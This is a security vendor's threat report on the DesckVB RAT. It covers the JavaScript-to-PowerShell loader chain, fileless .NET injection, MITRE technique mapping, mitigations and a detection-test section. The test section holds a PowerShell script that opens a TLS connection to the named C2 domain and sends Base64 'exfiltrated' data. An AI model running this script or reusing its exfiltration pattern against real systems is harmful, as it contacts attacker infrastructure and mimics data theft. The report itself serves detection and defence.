SOC Prime Bias: Medium

09 Apr 2026 17:59
newspaper icon Point Wild

DesckVB RAT Analysis: From JavaScript Loader to Fileless .NET RAT

Author Photo
SOC Prime Team linkedin icon Follow
DesckVB RAT Analysis: From JavaScript Loader to Fileless .NET RAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

DesckVB RAT is a JavaScript-driven trojan that chains into a PowerShell loader to fetch and run a fileless .NET DLL directly in memory. To conceal execution, the loader relies on Base64 encoding and string-reversal obfuscation, abuses InstallUtil.exe as a LOLBin, and spawns a new process using CreateProcessA. Once active, the RAT establishes encrypted HTTPS C2 communications and supports modules for keylogging, webcam access, and anti-AV discovery.

Investigation

Analysis indicates the initial JavaScript stage writes a PowerShell script into C:\Users\Public, then reaches out to an obfuscated domain to download a .NET assembly (for example, ClassLibrary3.dll). The assembly loads supporting DLLs, creates a suspended process, and injects payload code while reporting configuration details such as a secondary malicious domain and port. Network telemetry confirms TLS-encrypted communications from the infected host to the attacker’s C2 infrastructure.

Mitigation

Block execution of untrusted or unsigned PowerShell scripts and restrict use of InstallUtil.exe for non-administrative or unexpected workflows. Apply strict outbound controls, including HTTPS inspection where feasible and domain reputation filtering for identified malicious infrastructure. On endpoints, detect CreateProcessA usage with suspended-process flags and alert on in-memory .NET assembly loading patterns consistent with fileless injection.

Response

If indicators are detected, isolate the endpoint, stop the malicious process chain, and capture memory dumps for analysis of in-memory assemblies and injected regions. Remove the dropped PowerShell artifacts from C:\Users\Public and eradicate any related DLLs or loader remnants. Reset impacted credentials, rotate exposed secrets, and review firewall/proxy logs for outbound connections to the listed domains and ports.

"graph TB %% Class definitions classDef action fill:#ffcc99 classDef tool fill:#99ccff classDef malware fill:#ccffcc classDef file fill:#dddddd %% Nodes loader_js["<b>Tool</b> – <b>Name</b>: Obfuscated JavaScript Loader<br/><b>Technique</b>: T1027.006 HTML Smuggling<br/><b>Technique</b>: T1027.008 Stripped Payloads<br/><b>Description</b>: Uses Base64 and reversed strings to hide commands"] class loader_js tool powershell_script["<b>Tool</b> – <b>Name</b>: PowerShell Script lkpzw_01.ps1<br/><b>Technique</b>: T1059.001 PowerShell<br/><b>Description</b>: Executes with bypassed execution policy"] class powershell_script tool dotnet_assembly["<b>File</b>: Malicious .NET Assembly"] class dotnet_assembly file installutil_execution["<b>Tool</b> – <b>Name</b>: InstallUtil.exe<br/><b>Technique</b>: T1218.004 System Binary Proxy Execution<br/><b>Description</b>: Executes .NET DLL via trusted system binary"] class installutil_execution tool dotnet_reflection["<b>Malware</b> – <b>Name</b>: ClassLibrary3.dll<br/><b>Technique</b>: T1620 Reflective Code Loading<br/><b>Description</b>: Loads assembly directly into memory using reflection"] class dotnet_reflection malware process_hollow["<b>Action</b> – <b>Technique</b>: T1055.012 Process Hollowing<br/><b>Description</b>: Creates a suspended process and injects malicious code"] class process_hollow action thread_hijack["<b>Action</b> – <b>Technique</b>: T1055.003 Thread Execution Hijacking<br/><b>Description</b>: Hijacks thread execution within the target process"] class thread_hijack action dll_hijack["<b>Action</b> – <b>Technique</b>: T1574.001 DLL Hijack Execution Flow<br/><b>Description</b>: Loads additional DLLs in memory to extend functionality"] class dll_hijack action keylogger_module["<b>Malware</b> – <b>Name</b>: Microsoft.exe<br/><b>Technique</b>: T1056.001 Keylogging<br/><b>Description</b>: Drops keylogger and other modules"] class keylogger_module malware c2_https["<b>Action</b> – <b>Technique</b>: T1071.001 Web Protocols<br/><b>Description</b>: Communicates over HTTPS blending with legitimate traffic"] class c2_https action %% Connections loader_js –>|writes and executes| powershell_script powershell_script –>|downloads assembly| dotnet_assembly dotnet_assembly –>|executed via| installutil_execution installutil_execution –>|loads with reflection| dotnet_reflection dotnet_reflection –>|creates suspended process| process_hollow process_hollow –>|uses thread hijacking| thread_hijack thread_hijack –>|loads additional DLLs| dll_hijack dll_hijack –>|enables| keylogger_module keylogger_module –>|communicates with C2| c2_https "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    The attacker, having obtained initial foothold, launches a PowerShell‑based “living‑off‑the‑land” payload that opens a TLS‑wrapped TCP connection to the hard‑coded C2 domain manikandan83.mysynology.net on port 7535. The payload encodes a dummy data block with Base64 (illustrating T1132.002) and streams it over the TLS channel. Because PowerShell’s .NET classes are used, no external binaries are written to disk, mirroring the file‑less nature of DesckVB RAT. The connection is established by a child process (powershell.exe) which will be captured by Sysmon as a network connection event with the exact domain, port, and TLS handshake flag the rule monitors.

  • Regression Test Script:

    # --------------------------------------------------------------
# DesckVB RAT C2 Communication Simulation (PowerShell)
# --------------------------------------------------------------
# Parameters
$c2Domain = "manikandan83.mysynology.net"
$c2Port   = 7535

# Dummy payload (Base64‑encoded) – represents exfiltrated data
$payload  = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensor_data=42"))

try {
    # Establish TCP connection
    $tcpClient = New-Object System.Net.Sockets.TcpClient($c2Domain, $c2Port)
    $netStream = $tcpClient.GetStream()

    # Wrap with TLS (SslStream)
    $sslStream = New-Object System.Net.Security.SslStream($netStream,$false,({$true}))
    $sslStream.AuthenticateAsClient($c2Domain)

    Write-Host "[+] TLS handshake completed with $c2Domain:$c2Port"

    # Send payload length prefix (4‑byte big‑endian) then data
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($payload)
    $len   = [BitConverter]::GetBytes([System.Net.IPAddress]::HostToNetworkOrder($bytes.Length))
    $sslStream.Write($len,0,$len.Length)
    $sslStream.Write($bytes,0,$bytes.Length)
    $sslStream.Flush()
    Write-Host "[+] Payload sent (Base64 length $($bytes.Length))"

} catch {
    Write-Error "[-] Connection failed: $_"
} finally {
    # Clean shutdown
    if ($sslStream) { $sslStream.Close() }
    if ($netStream) { $netStream.Close() }
    if ($tcpClient) { $tcpClient.Close() }
    Write-Host "[*] Connection terminated."
}

  • Cleanup Commands:

    # Ensure any lingering PowerShell NetTCP connections are closed
Get-Process -Name powershell | Where-Object {
    $_.Modules.ModuleName -match 'System.Net.Sockets.TcpClient'
} | Stop-Process -Force

# Optional: Remove Sysmon (if this is a one‑off test environment)
# & "$env:ProgramFilesSysmonSysmon.exe" -u

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free